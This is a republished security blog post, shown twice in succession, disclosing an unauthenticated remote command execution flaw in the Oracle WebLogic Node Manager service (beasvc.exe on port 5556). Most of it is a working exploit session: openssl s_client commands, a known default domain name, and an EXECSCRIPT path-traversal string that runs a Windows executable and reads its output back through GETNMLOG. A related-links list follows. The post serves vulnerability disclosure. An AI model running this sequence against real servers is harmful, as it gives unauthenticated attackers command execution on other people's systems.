Oracle WebLogic Server Node Manager "beasvc.exe" Remote Command Execution
2010-02-06 14:56
706 查看
http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html
Time for the final bug in our Week of Web Server
bugs.
It is in Vulndisco since Oct, 2008.
Oracle
Weblogic
has an optional Node
Manager
utility which is used to start/stop server
instances from a remote
location.
It is important to know that Node
Manager
is beasvc.exe
process which listens on port 5556.
It
supports several commands, no authentication is required to enter some
of these commands, you will only need to know the name of Weblogic
domain (btw in the default install Weblogic
has at least 2 domains - wl_server and medrec). As beasvc.exe
speaks over SSL we will use openssl utility:
character '>' marks the beginning of our command (write the command after '>' and press Enter)
$ openssl s_client -host 192.168.56.101 -port 5556
>HELLO asdf
+OK Node
manager
v10.3 started
Remote
version leak bug here ;-)
>DOMAIN xyz
-ERR I/O error while reading domain directory
>GETNMLOG
java.io.FileNotFoundException: Domain directory 'C:/Oracle
/Middleware/wlserver_10.3/common/nodemanager' invalid (domain salt file not found)
at weblogic
.nodemanager.server
.DomainManager.initialize(DomainManager.java:79)
at weblogic
.nodemanager.server
.DomainManager.(DomainManager.java:54)
at weblogic
.nodemanager.server
.NMServer.getDomainManager(NMServer.java:257)
at weblogic
.nodemanager.server
.Handler.handleDomain(Handler.java:218)
at weblogic
.nodemanager.server
.Handler.handleCommand(Handler.java:108)
at weblogic
.nodemanager.server
.Handler.run(Handler.java:70)
at java.lang.Thread.run(Thread.java:619)
>DOMAIN wl_server
+OK Current domain set to 'wl_server'
>EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe
-ERR 1
>GETNMLOG
+OK Node
manager
log file sent
Obviously it is a remote
preauth command execution bug!
Time for the final bug in our Week of Web Server
bugs.
It is in Vulndisco since Oct, 2008.
Oracle
Weblogic
has an optional Node
Manager
utility which is used to start/stop server
instances from a remote
location.
It is important to know that Node
Manager
is beasvc.exe
process which listens on port 5556.
It
supports several commands, no authentication is required to enter some
of these commands, you will only need to know the name of Weblogic
domain (btw in the default install Weblogic
has at least 2 domains - wl_server and medrec). As beasvc.exe
speaks over SSL we will use openssl utility:
character '>' marks the beginning of our command (write the command after '>' and press Enter)
$ openssl s_client -host 192.168.56.101 -port 5556
>HELLO asdf
+OK Node
manager
v10.3 started
Remote
version leak bug here ;-)
>DOMAIN xyz
-ERR I/O error while reading domain directory
>GETNMLOG
java.io.FileNotFoundException: Domain directory 'C:/Oracle
/Middleware/wlserver_10.3/common/nodemanager' invalid (domain salt file not found)
at weblogic
.nodemanager.server
.DomainManager.initialize(DomainManager.java:79)
at weblogic
.nodemanager.server
.DomainManager.(DomainManager.java:54)
at weblogic
.nodemanager.server
.NMServer.getDomainManager(NMServer.java:257)
at weblogic
.nodemanager.server
.Handler.handleDomain(Handler.java:218)
at weblogic
.nodemanager.server
.Handler.handleCommand(Handler.java:108)
at weblogic
.nodemanager.server
.Handler.run(Handler.java:70)
at java.lang.Thread.run(Thread.java:619)
>DOMAIN wl_server
+OK Current domain set to 'wl_server'
>EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe
-ERR 1
>GETNMLOG
<Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < [-r count] [-s count] [[-j host-list] | [-k host-list]]> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <Options:> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -t Ping the specified host until stopped.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < To see statistics and continue - type Control-Break;> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < To stop - type Control-C.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -a Resolve addresses to hostnames.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -n count Number of echo requests to send.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -l size Send buffer size.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -f Set Don't Fragment flag in packet (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -i TTL Time To Live.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -v TOS Type Of Service (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -r count Record route for count hops (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -s count Timestamp for count hops (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -j host-list Loose source route along host-list (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -k host-list Strict source route along host-list (IPv4-only).> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -w timeout Timeout in milliseconds to wait for each reply.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -R Use routing header to test reverse route also (IPv6-only). > <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -S srcaddr Source address to use.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -4 Force using IPv4.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> < -6 Force using IPv6.> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <> <Jan 22, 2010 6:37:51 AM> <INFO> <> .
+OK Node
manager
log file sent
Obviously it is a remote
preauth command execution bug!
相关文章推荐
- Oracle Weblogic nodemanager STOP script Bash and Python
- ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
- Apache James Server 2.3.2 - Remote Command Execution
- Cannot obtain the required interface ("IID_IDBCreateCommand") from OLE DB provider "OraOLEDB.Oracle" for linked server xxxx
- The path "C:\Oracle\Middleware\wlserver_10.3" contains the wrong version of WebLogic Server. Expect
- Starting Cache Servers Using Node Manager of WebLogic Server 10.3.4
- Start and Stop Oracle Weblogic NodeManager Via Shell Alias
- Oracle WebLogic Server 11gR1 (10.3.6) + Coherence + OEPE 的安装
- how to config the tftpd-hpa server in the ubuntu using for remote tftp client '-p' and '-r' command
- VC2005中 提示”生成"cmd.exe"时出错 “
- 如何在oracle的存储过程中调用server上的bat或exe文件
- 解决:浏览页面时,出现"WebDev.WebServer.exe 遇到问题需要关闭。我们对此引起的不便表示抱歉。"问题
- Weblogic AdminServer启动失败,<Security> <BEA-090870> <The realm "myrealm" failed to be loaded
- Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability
- weblogic.nodemanager.common.ConfigException: Native version is enabled but nodemanager native library could not be loaded 解决办法
- What's New in Oracle WebLogic Server 12c Release 1 (12.1.1)
- Oracle Fusion Middleware Infrastructure WebLogic Server 12c (12.1.3) 在windows 上安装
- WebLogic+OSB(Oracle Server Bus)安装流程
- IIS7.5发布之后对PUT接口进行请求,提示“Remote server returned error: (405) method not allowed"
- npm ERR! Windows_NT 6.1.7601 npm ERR! argv "C:\\Program Files\\nodejs\\node.exe" "C:\\Program Files\